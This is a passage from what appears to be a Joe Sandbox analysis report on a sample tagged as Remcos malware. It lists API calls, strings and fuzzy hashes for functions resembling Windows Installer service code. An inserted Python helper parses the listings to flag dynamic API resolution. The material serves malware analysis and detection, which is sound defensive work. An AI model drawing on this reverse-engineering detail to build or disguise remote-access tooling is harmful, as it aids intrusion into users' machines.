                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00389726,00381000), ref: 0038960B
                                                                • TerminateProcess.KERNEL32(00000000,?,00389726,00381000), ref: 00389612
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                • String ID:
                                                                • API String ID: 3231755760-0
                                                                • Opcode ID: af16c6e6b54c8764e1d6b9c60d3813b8d145d7602710ffff9b1d0f4ff0b2cfd8
                                                                • Instruction ID: 41b55fee4ae3bbe3853cbcecfb7caa28da83f26c9660e1eda46360b9177101be
                                                                • Opcode Fuzzy Hash: af16c6e6b54c8764e1d6b9c60d3813b8d145d7602710ffff9b1d0f4ff0b2cfd8
                                                                • Instruction Fuzzy Hash: D4D01272000304FBCB422BE1EC0DA493F3CEF44322F004080F309C22A0CB354442CB65
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00389BC0), ref: 00389C15
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 6dca79c6812d80a303f7881e9f7ca47739ce57b09cb4ba8921e5fe915d336d31
                                                                • Instruction ID: cba9aa336692802a3e8457f0b961977f6853e29f132a48a61a835946c0bb2cbe
                                                                • Opcode Fuzzy Hash: 6dca79c6812d80a303f7881e9f7ca47739ce57b09cb4ba8921e5fe915d336d31
                                                                • Instruction Fuzzy Hash: DC9002B0251740464A4337706C1D55527A45F4872AB4504D2E012C4294DA544140D711
                                                                APIs
                                                                  • Part of subcall function 00383C24: EnterCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383C31
                                                                  • Part of subcall function 00383C24: LeaveCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383CDF
                                                                • RegOpenKeyExW.ADVAPI32(80000000,CLSID,00000000,00020019,?,00000002,00000000,00007530), ref: 00387EFB
                                                                • RegCloseKey.ADVAPI32(?), ref: 00387F0B
                                                                  • Part of subcall function 00388745: GlobalAlloc.KERNEL32(00000000,?,00000000,?,00387F98,00000200), ref: 0038875F
                                                                  • Part of subcall function 00388745: memset.MSVCRT ref: 00388778
                                                                • CoUninitialize.OLE32 ref: 00387F5B
                                                                • MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000200), ref: 00388058
                                                                • CoUninitialize.OLE32 ref: 00388066
                                                                • GetLastError.KERNEL32 ref: 0038806C
                                                                • GetLastError.KERNEL32(00000000), ref: 003880AC
                                                                • CoUninitialize.OLE32(00000002,00000000,00007530), ref: 003880C2
                                                                • InitializeCriticalSection.KERNEL32(0038C488,00000002,00000000,00007530), ref: 003881D2
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003881F5
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00388204
                                                                • GetLastError.KERNEL32 ref: 00388246
                                                                • GetLastError.KERNEL32 ref: 00388276
                                                                • CoRegisterClassObject.OLE32(003825E0,?,00000015,00000001,?,00000002,00000000,00007530), ref: 003882C0
                                                                • MsgWaitForMultipleObjects.USER32(00000003,?,00000000,000000FF,00001CFF), ref: 00388343
                                                                • TranslateMessage.USER32(?), ref: 00388375
                                                                • DispatchMessageW.USER32(?), ref: 00388382
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00388394
                                                                • GetLastError.KERNEL32 ref: 003883C6
                                                                • GetLastError.KERNEL32 ref: 003883CC
                                                                • GetLastError.KERNEL32(00000000), ref: 0038841B
                                                                • EnterCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 0038843C
                                                                • CloseHandle.KERNEL32 ref: 00388448
                                                                • LeaveCriticalSection.KERNEL32(0038C488), ref: 00388459
                                                                • EnterCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 0038846C
                                                                • CloseHandle.KERNEL32 ref: 00388478
                                                                • LeaveCriticalSection.KERNEL32(0038C488), ref: 00388489
                                                                • EnterCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 0038849C
                                                                • CloseHandle.KERNEL32 ref: 003884A8
                                                                • LeaveCriticalSection.KERNEL32(0038C488), ref: 003884B9
                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 003884C3
                                                                • DeleteCriticalSection.KERNEL32(0038C488,00000001,00000000), ref: 003884E0
                                                                • CoUninitialize.OLE32(?,?,?,?,00000200), ref: 003884EC
                                                                • GlobalFree.KERNEL32(?), ref: 0038850D
                                                                • GlobalFree.KERNEL32(?), ref: 00388526
                                                                • GlobalFree.KERNEL32(?), ref: 0038853F
                                                                • GlobalFree.KERNEL32(?), ref: 00388558
                                                                • GlobalFree.KERNEL32(?), ref: 00388571
                                                                Strings
                                                                • Set of COMGLB_UNMARSHALING_POLICY failed., xrefs: 00388163
                                                                • ServiceThreadMain: CreateWaitableTimer failed., xrefs: 0038824C
                                                                • CLSID, xrefs: 00387EF1
                                                                • ServiceThreadMain: Class registration failed, xrefs: 00388400
                                                                • ServiceThreadMain: CoInitializeSecurity failed, xrefs: 003880A0
                                                                • Wait Failed in MsgWait., xrefs: 003883D4
                                                                • CoCreateInstance of CLSID_GlobalOptions failed., xrefs: 00388105
                                                                • ServiceThreadMain: CreateEvent failed., xrefs: 0038840D
                                                                • ServiceThreadMain: SetWaitableTimer failed., xrefs: 0038827C
                                                                • ServiceThreadMain: CreateSD for CreateWaitableTimer failed., xrefs: 003881B1
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$ErrorLast$Global$FreeUninitialize$CloseEnterLeave$HandleMessage$CreateEvent$AbsoluteAllocClassDeleteDispatchInitializeMakeMultipleObjectObjectsOpenPeekRegisterTranslateWaitmemset
                                                                • String ID: CLSID$CoCreateInstance of CLSID_GlobalOptions failed.$ServiceThreadMain: Class registration failed$ServiceThreadMain: CoInitializeSecurity failed$ServiceThreadMain: CreateEvent failed.$ServiceThreadMain: CreateSD for CreateWaitableTimer failed.$ServiceThreadMain: CreateWaitableTimer failed.$ServiceThreadMain: SetWaitableTimer failed.$Set of COMGLB_UNMARSHALING_POLICY failed.$Wait Failed in MsgWait.
                                                                • API String ID: 535215923-1806920385
                                                                • Opcode ID: 13427feb05d728dd628582dca414e25513161ee2b7913a086e3a0f92f3013ef8
                                                                • Instruction ID: 5974d713e743d9f106b7d36e377ec7e70b0c03842a43d17903c026289cb4a28a
                                                                • Opcode Fuzzy Hash: 13427feb05d728dd628582dca414e25513161ee2b7913a086e3a0f92f3013ef8
                                                                • Instruction Fuzzy Hash: 96029FB5900329AFEB23BB749D89EAA77BCEB44714F5041D9F509A7190DF709E818F20
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(ISMIF32.DLL,00000000,00000800,?,00000000), ref: 003857F6
                                                                • GetProcAddress.KERNEL32(00000000,InstallStatusMIF), ref: 0038580C
                                                                • GetSystemDefaultLangID.KERNEL32(?,00000000), ref: 0038585C
                                                                • memset.MSVCRT ref: 0038589D
                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000000,?,?,00000105,00000000,?,00000000), ref: 003858C5
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0038C920,00000100,00000000,00000000,?,00000000), ref: 00385902
                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00385976
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressByteCharDefaultFormatFreeLangLoadMessageMultiProcSystemWidememset
                                                                • String ID: ISMIF32.DLL$InstallStatusMIF$Installer error %i
                                                                • API String ID: 2186023739-4237920443
                                                                • Opcode ID: 3545ff2daaafd3e40388f22f1ed2bf789339541f99a5b94401db24fecf823602
                                                                • Instruction ID: 562e7f41135a1235a89df0d02cda882c1b84817781b33cab7f226ded72c0043b
                                                                • Opcode Fuzzy Hash: 3545ff2daaafd3e40388f22f1ed2bf789339541f99a5b94401db24fecf823602
                                                                • Instruction Fuzzy Hash: A741E370690318AAE723BB799C8EFFA36ACEB54720F1005E5F46AE60C0D7B49D404764
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(kernel32.dll,OLEAUT32.dll,0000005C,?,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388F8C
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00388F9F
                                                                • GetLastError.KERNEL32(?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FAB
                                                                • FreeLibrary.KERNEL32(00000000,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FE0
                                                                • SetLastError.KERNEL32(00000000,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FE7
                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00388FF8
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastLibrary$AddressDirectoryFreeLoadProcSystem
                                                                • String ID: GetSystemWow64DirectoryW$OLEAUT32.dll$kernel32.dll
                                                                • API String ID: 1648426049-138662608
                                                                • Opcode ID: a120068bb72f997d3a576da8cbf206d6fa6cf6de58aea4263e469907c64e3fb5
                                                                • Instruction ID: 7b6a255c1e7eed4ee5acffc4841448c73e7757a79aabbf5768e33f1500b46d53
                                                                • Opcode Fuzzy Hash: a120068bb72f997d3a576da8cbf206d6fa6cf6de58aea4263e469907c64e3fb5
                                                                • Instruction Fuzzy Hash: D7019E76204711ABDB137768BC4CE6B7BAFEB84755F5600E5FB0292290EEB0CC018B54
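Added example, not part of the Joe Sandbox report: a small Python triage helper that parses API bullets in the format used by the function listings above and pulls out the module names handed to LoadLibrary*/GetModuleHandle* and the export names handed to GetProcAddress. That pairing is what the report's "Contains functionality to dynamically determine API calls" signature is built on, and reading it out of the listing is quicker than scanning each block by eye. The two embedded sample listings are copied from the ISMIF32.DLL and GetSystemWow64DirectoryW blocks above; the argument-position table follows the Win32 prototypes, and values beyond a prototype's real parameter count (LoadLibraryW takes one argument, yet the bullet shows thirteen) are treated as stack contents the IDA plugin printed, not as arguments, which is our reading of the output.

```python
"""Extract dynamically resolved imports from Joe Sandbox API call listings.

Bullets look like:  • <Api>.<Module>(<arg>,<arg>,...), ref: <hex address>
optionally prefixed with "Part of subcall function <hex>:".
"""
import re
from typing import Optional

# Index of the name-carrying parameter per Win32 prototype:
# LoadLibraryW(lpLibFileName), LoadLibraryExW(lpLibFileName, hFile, dwFlags),
# GetModuleHandleExW(dwFlags, lpModuleName, phModule), GetProcAddress(hModule, lpProcName).
# Anything past the prototype's parameter count is stack residue shown by the plugin.
LOADER_NAME_ARG = {"LoadLibraryW": 0, "LoadLibraryA": 0, "LoadLibraryExW": 0,
                   "LoadLibraryExA": 0, "GetModuleHandleW": 0, "GetModuleHandleExW": 1}
PROC_NAME_ARG = {"GetProcAddress": 1}

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Sample listings copied from the two function blocks above in this report.
SAMPLE_WOW64 = """\
• LoadLibraryW.KERNEL32(kernel32.dll,OLEAUT32.dll,0000005C,?,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388F8C
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00388F9F
• GetLastError.KERNEL32(?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FAB
• FreeLibrary.KERNEL32(00000000,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FE0
• SetLastError.KERNEL32(00000000,?,00389046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00388FE7
• GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00388FF8
"""
SAMPLE_ISMIF = """\
• LoadLibraryExW.KERNEL32(ISMIF32.DLL,00000000,00000800,?,00000000), ref: 003857F6
• GetProcAddress.KERNEL32(00000000,InstallStatusMIF), ref: 0038580C
• GetSystemDefaultLangID.KERNEL32(?,00000000), ref: 0038585C
• memset.MSVCRT ref: 0038589D
• FormatMessageW.KERNEL32(00001000,00000000,00000000,?,?,00000105,00000000,?,00000000), ref: 003858C5
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0038C920,00000100,00000000,00000000,?,00000000), ref: 00385902
• FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00385976
"""


def parse_call(line: str) -> Optional[dict]:
    """Parse one API bullet into a dict, or return None for non-API lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": raw.split(",") if raw else [],
        "ref": int(m.group("ref"), 16),
        "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def string_arg(args: list, index: int) -> Optional[str]:
    """Return args[index] only when it is a literal string (not a hex value or '?')."""
    if index >= len(args):
        return None
    value = args[index].strip()
    if value == "?" or HEX_RE.match(value):
        return None
    return value


def summarize_function(listing: str) -> dict:
    """Summarize one function's API bullets: modules loaded, exports resolved by name."""
    calls = [c for c in (parse_call(ln) for ln in listing.splitlines()) if c]
    modules, exports = [], []
    for c in calls:
        if c["api"] in LOADER_NAME_ARG:
            name = string_arg(c["args"], LOADER_NAME_ARG[c["api"]])
            if name:
                modules.append(name)
        elif c["api"] in PROC_NAME_ARG:
            name = string_arg(c["args"], PROC_NAME_ARG[c["api"]])
            if name:
                exports.append(name)
    return {
        "call_count": len(calls),
        "loaded_modules": modules,
        "resolved_exports": exports,
        # Loader call plus GetProcAddress with a literal name in one function
        # is the pattern behind "dynamically determine API calls".
        "dynamic_api_resolution": bool(modules) and bool(exports),
    }


if __name__ == "__main__":
    for name, sample in (("wow64", SAMPLE_WOW64), ("ismif", SAMPLE_ISMIF)):
        print(name, summarize_function(sample))
```

Paste any other function block's APIs section into summarize_function to get the same summary; a GetProcAddress whose second argument is a hex value (ordinal or register-held pointer) is deliberately not counted, since the listing then carries no export name to report.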
                                                                APIs
                                                                • lstrlenW.KERNEL32 ref: 00385475
                                                                  • Part of subcall function 00388665: GlobalAlloc.KERNEL32(00000040,?,00000020,-00000002,00000000,?,003866E9,?,?,?), ref: 00388680
                                                                • CoInitialize.OLE32(00000000), ref: 003854EB
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 003854FF
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000008), ref: 00385511
                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 0038551B
                                                                • SetThreadToken.ADVAPI32(00000000,00000000,?,00000000,00000008), ref: 00385534
                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 0038553E
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00385559
                                                                • GetLastError.KERNEL32(?,?,00000000,00000008), ref: 00385565
                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000008), ref: 0038558D
                                                                • CoUninitialize.OLE32(?,00000000,00000008), ref: 00385593
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$Library$AddressAllocCurrentDirectoryFreeGlobalInitializeLoadProcThreadTokenUninitializelstrlen
                                                                • String ID:
                                                                • API String ID: 1429436423-0
                                                                • Opcode ID: 863769ae83ba8894b321d20c8162105efbc1c0853d153c30e56215e6c985c0d7
                                                                • Instruction ID: 76f4586548783eafc516c8b354ffeefdf1d3c1483578b0cece6534c8f467c669
                                                                • Opcode Fuzzy Hash: 863769ae83ba8894b321d20c8162105efbc1c0853d153c30e56215e6c985c0d7
                                                                • Instruction Fuzzy Hash: 8941C172940B255BCB237B289C48BBE77AAAF95751F1201E9E847EB290DF34CD418790
                                                                Strings
                                                                • api-ms-win-core-delayload-l1-1-1.dll, xrefs: 00389103
                                                                • ResolveDelayLoadedAPI, xrefs: 00389123
                                                                • KERNEL32.DLL, xrefs: 00389113
                                                                • ResolveDelayLoadsFromDll, xrefs: 00389137
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KERNEL32.DLL$ResolveDelayLoadedAPI$ResolveDelayLoadsFromDll$api-ms-win-core-delayload-l1-1-1.dll
                                                                • API String ID: 0-3594434003
                                                                • Opcode ID: de86348c316d9ab85040fce4bccf1830cb77f7fced221620d6c40793cd23d4e9
                                                                • Instruction ID: 2cb44bb36a473442861f95bf97c71ad143f698d678f194f79095a59dfd6f875d
                                                                • Opcode Fuzzy Hash: de86348c316d9ab85040fce4bccf1830cb77f7fced221620d6c40793cd23d4e9
                                                                • Instruction Fuzzy Hash: E5F0B472686733674F337AE95C9AAFB268A5A05B9130F15E7F900EF144DB20CD4083A0
                                                                APIs
                                                                • RegisterServiceCtrlHandlerW.ADVAPI32(MSIServer,Function_000085A0), ref: 00387E2A
                                                                • GetLastError.KERNEL32 ref: 00387E39
                                                                  • Part of subcall function 003859F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 00385A12
                                                                  • Part of subcall function 003859F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 00385A8A
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385AAA
                                                                  • Part of subcall function 003859F2: GlobalFree.KERNEL32(?), ref: 00385ABF
                                                                  • Part of subcall function 003859F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00385B14
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 00385B35
                                                                  • Part of subcall function 003859F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 00385B3C
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 00385B59
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385B65
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00007EB0,00000000,00000000,0038C6A8), ref: 00387E72
                                                                • GetLastError.KERNEL32(00007530), ref: 00387E80
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue$CloseCreate$CtrlFreeGlobalHandlerQueryRegisterServiceThreadlstrlen
                                                                • String ID: MSIServer$RegisterServiceCtrlHandler failed.
                                                                • API String ID: 1878216277-870239898
                                                                • Opcode ID: 364c58c065b5746d15e18e2532e5f03572ef3ccda11991487373288e0eb881a5
                                                                • Instruction ID: c092eadaed39e7eb6690889b745893814669e49689fa79d5a0e2c11d0c936140
                                                                • Opcode Fuzzy Hash: 364c58c065b5746d15e18e2532e5f03572ef3ccda11991487373288e0eb881a5
                                                                • Instruction Fuzzy Hash: B601A271649321ABC3237766AC4DE976E9EDB91B61F2002D1FA09E51D0D670DC0287B1
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: MSIINSTANCEGUID=
                                                                • API String ID: 1659193697-2015669138
                                                                • Opcode ID: f22d02e120ba7666a4b32144f3fc96ead52d61832d25b65bffa329fb56a6fbc2
                                                                • Instruction ID: 4b940b8c44b42e57c25b2500950b3e24f73e977a8e713810ff08db8c07853c82
                                                                • Opcode Fuzzy Hash: f22d02e120ba7666a4b32144f3fc96ead52d61832d25b65bffa329fb56a6fbc2
                                                                • Instruction Fuzzy Hash: FB41E4B6A00316DBCB13BB70EC48B5AB7BDFB44314F2405E4EA05AB6A1EB359D45CB50
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,Msi.dll,00000000,00000000,?,?,00383B73), ref: 00385C06
                                                                • GetProcAddress.KERNEL32(00000000,QueryInstanceCount), ref: 00385C18
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00383B73), ref: 00385C35
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00383B73), ref: 00385C42
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary$AddressHandleModuleProc
                                                                • String ID: Msi.dll$QueryInstanceCount
                                                                • API String ID: 1227796897-1207408768
                                                                • Opcode ID: 3c632003f09907941ba1a8258af40486c98e440c8bc5f7e944848173467ad044
                                                                • Instruction ID: 270bf3c9e188f1675643aa53a19cea06cab3b30730ecaadaaafc3877a253e5c9
                                                                • Opcode Fuzzy Hash: 3c632003f09907941ba1a8258af40486c98e440c8bc5f7e944848173467ad044
                                                                • Instruction Fuzzy Hash: DFF09A31A50308FBCB02BB619D0DE9E7BBCEF44B46F0104E0E802E10A0DB71CE019B64
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: PECMS$PackageCode$REINSTALL=ALL REINSTALLMODE=%s$rpoedcamusv
                                                                • API String ID: 1659193697-1647986965
                                                                • Opcode ID: d4d804d415ab1ca468851c356ae828b0fa99ff380dc419c724e5a840e372b9d7
                                                                • Instruction ID: 59ad5ad75adbf5dd6a2b74fe1e6ed4709526faff945eff4096f0d4ec4f68b2d5
                                                                • Opcode Fuzzy Hash: d4d804d415ab1ca468851c356ae828b0fa99ff380dc419c724e5a840e372b9d7
                                                                • Instruction Fuzzy Hash: 8061D3726087419BDB32FB64D855BAB73E8EB84750F1049AAF945CB280EF70DA44C792
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383C31
                                                                • SetServiceStatus.ADVAPI32(0038C850,?,?,?,00383C1E,00000000,00000000), ref: 00383CC0
                                                                • GetLastError.KERNEL32(?,?,?,00383C1E,00000000,00000000), ref: 00383CCC
                                                                • LeaveCriticalSection.KERNEL32(0038C838,?,?,?,00383C1E,00000000,00000000), ref: 00383CDF
                                                                Strings
                                                                • SetServiceStatus failed., xrefs: 00383CD4
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterErrorLastLeaveServiceStatus
                                                                • String ID: SetServiceStatus failed.
                                                                • API String ID: 427148986-1344523210
                                                                • Opcode ID: 360c3d6bab103400f70583474a9ce3b802da661ada8d850c2d0a75dfdc8e60c5
                                                                • Instruction ID: 621ec3e7ad7278402908d1eff7fc2bebefd04cbe359827e8a255722cfef20973
                                                                • Opcode Fuzzy Hash: 360c3d6bab103400f70583474a9ce3b802da661ada8d850c2d0a75dfdc8e60c5
                                                                • Instruction Fuzzy Hash: 7A116AB29A0354DBC713BF29EC4872977FCE784B61F1150EAE805A7761C3B48944CBA0
                                                                APIs
                                                                • GetVersion.KERNEL32(00386E67,?), ref: 003863A0
                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 003863B3
